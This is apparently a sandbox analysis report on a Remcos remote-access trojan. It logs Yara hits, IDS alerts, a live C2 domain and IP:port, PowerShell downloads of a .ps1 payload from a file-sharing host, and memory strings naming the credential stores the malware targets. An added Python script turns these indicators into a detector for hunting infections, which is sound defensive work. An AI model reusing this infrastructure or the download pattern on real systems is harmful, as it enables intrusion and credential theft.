Source: Yara match; File source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.2% probability
Source: powershell.exe, 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_2a5a79b5-8)

                Exploits

                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49726 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49727 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49729 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49732 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49733 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49734 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49709 -> 37.120.208.40:56379
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49713 -> 37.120.208.40:56379
                Source: Malware configuration extractor | URLs: abokirem.duckdns.org
                Source: global traffic | TCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
                Source: unknown | DNS query: name: abokirem.duckdns.org
                Source: global traffic | TCP traffic: 192.168.2.9:49709 -> 37.120.208.40:56379
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 37.120.208.40
                Source: Joe Sandbox View | IP Address: 168.119.145.117
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49715 -> 178.237.33.50:80
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49728 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49708 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49732 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49725 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49729 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49710 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49724 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49722 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49718 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49734 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49719 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49730 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49721 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49717 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49727 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49726 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49731 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49723 -> 168.119.145.117:443
                Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49733 -> 168.119.145.117:443
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
                Source: powershell.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global traffic | DNS traffic detected: DNS query: 0x0.st
                Source: global traffic | DNS traffic detected: DNS query: abokirem.duckdns.org
                Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
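                The network entries above carry everything needed to hunt for this sample on other hosts: the C2 hostname from the extracted configuration, the C2 endpoint 37.120.208.40:56379, the Remcos JA3 hash, the staging URL on 0x0.st with its WindowsPowerShell user agent, and the geoplugin.net check-in. The Python below is an added example (not Joe Sandbox code and not part of this report) that parses report entries in the fused form they appear in on this page into an indicator set and runs it over constructed Zeek-style DNS, connection, TLS and HTTP records. The event schema, the choice to treat geoplugin.net as context rather than a blocking indicator (it is a public geolocation API that Remcos queries at check-in, so a hit on it alone proves little), and the "PowerShell user agent fetching a .ps1" heuristic are assumptions of the example.

```python
"""Added example: turn this report's network entries into an IOC set and run it
over DNS / connection / TLS / HTTP events. Not Joe Sandbox code; the report
lines are copied from the page, the events below are constructed."""
import ipaddress
import re
from dataclasses import dataclass, field

# Report entries, copied as extracted (column boundaries are fused in the text).
REPORT_LINES = [
    "Source: Malware configuration extractorURLs: abokirem.duckdns.org",
    "Source: global trafficTCP traffic: 192.168.2.9:49709 -> 37.120.208.40:56379",
    "Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e",
    "Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: "
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
    "Host: 0x0.stConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1"
    "Host: geoplugin.netCache-Control: no-cache",
    "Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org",
    "Source: global trafficDNS traffic detected: DNS query: 0x0.st",
]

# geoplugin.net is a public geolocation API that Remcos queries at check-in;
# keep it as context, not as a blocking indicator (assumption of this example).
CONTEXT_ONLY = {"geoplugin.net"}

@dataclass
class IocSet:
    domains: set = field(default_factory=set)
    c2_endpoints: set = field(default_factory=set)   # (ip, port)
    ja3: set = field(default_factory=set)
    urls: set = field(default_factory=set)           # (host, path)
    user_agents: set = field(default_factory=set)

RE_C2 = re.compile(r"URLs: (\S+)")
RE_DNS = re.compile(r"DNS query: (\S+)")
RE_TCP = re.compile(r"TCP traffic: \S+ -> (\d+\.\d+\.\d+\.\d+):(\d+)")
RE_JA3 = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})")
RE_HTTP = re.compile(r"HTTP traffic detected: (?:GET|POST) (\S+) HTTP/1\.[01]")
RE_HOST = re.compile(r"Host: (.+?)(?:Connection:|Cache-Control:|$)")
RE_UA = re.compile(r"User-Agent: (.+?)Host:")

def parse_report(lines):
    """Extract indicators from report entries; drops sandbox-internal addresses."""
    iocs = IocSet()
    for line in lines:
        if m := RE_C2.search(line):
            iocs.domains.add(m.group(1))
        if m := RE_DNS.search(line):
            iocs.domains.add(m.group(1))
        if m := RE_TCP.search(line):
            ip, port = m.group(1), int(m.group(2))
            if ipaddress.ip_address(ip).is_global:   # 192.168.2.x is the sandbox
                iocs.c2_endpoints.add((ip, port))
        if m := RE_JA3.search(line):
            iocs.ja3.add(m.group(1))
        if m := RE_HTTP.search(line):
            if host := RE_HOST.search(line):
                iocs.urls.add((host.group(1).strip(" |"), m.group(1)))
            if ua := RE_UA.search(line):
                iocs.user_agents.add(ua.group(1).strip(" |"))
    iocs.domains -= CONTEXT_ONLY
    iocs.urls = {u for u in iocs.urls if u[0] not in CONTEXT_ONLY}
    return iocs

def match_events(iocs, events):
    """Return (event index, reason) for each event that hits an indicator."""
    hits = []
    for i, ev in enumerate(events):
        kind = ev["kind"]
        if kind == "dns" and ev["query"] in iocs.domains:
            hits.append((i, "dns:" + ev["query"]))
        elif kind == "conn" and (ev["dst"], ev["dport"]) in iocs.c2_endpoints:
            hits.append((i, f"c2:{ev['dst']}:{ev['dport']}"))
        elif kind == "ssl" and ev["ja3"] in iocs.ja3:
            hits.append((i, "ja3:" + ev["ja3"]))
        elif kind == "http":
            if (ev["host"], ev["uri"]) in iocs.urls:
                hits.append((i, f"url:{ev['host']}{ev['uri']}"))
            # Weaker, behaviour-based signal in the spirit of the "Windows
            # PowerShell HTTP activity" anomaly: PowerShell's UA pulling a .ps1.
            elif "WindowsPowerShell/" in ev["user_agent"] and ev["uri"].endswith(".ps1"):
                hits.append((i, "heuristic:powershell-fetches-ps1"))
    return hits

SAMPLE_EVENTS = [  # constructed, Zeek-style records
    {"kind": "dns", "src": "10.0.0.5", "query": "abokirem.duckdns.org"},
    {"kind": "conn", "src": "10.0.0.5", "dst": "37.120.208.40", "dport": 56379},
    {"kind": "ssl", "src": "10.0.0.5", "dst": "37.120.208.40",
     "ja3": "3b5074b1b5d032e5620f69f9f700ff0e"},
    {"kind": "http", "src": "10.0.0.7", "host": "0x0.st", "uri": "/8KuV.ps1",
     "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"},
    {"kind": "http", "src": "10.0.0.8", "host": "files.example.net", "uri": "/stage2.ps1",
     "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"},
    {"kind": "dns", "src": "10.0.0.9", "query": "geoplugin.net"},
    {"kind": "http", "src": "10.0.0.9", "host": "www.example.com", "uri": "/",
     "user_agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for idx, reason in match_events(parse_report(REPORT_LINES), SAMPLE_EVENTS):
        print(SAMPLE_EVENTS[idx]["src"], reason)
```

Running it flags the four hosts that reproduce this sample's traffic and the .ps1 download from an unrelated host via the heuristic, while the geoplugin.net lookup and the ordinary browsing record stay quiet. The host on port 56379 and the JA3 hash are the durable indicators here: the duckdns.org name and the 0x0.st paste can be rotated by the operator at no cost.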
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2488709838.0000000007606000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2973657147.0000000007260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
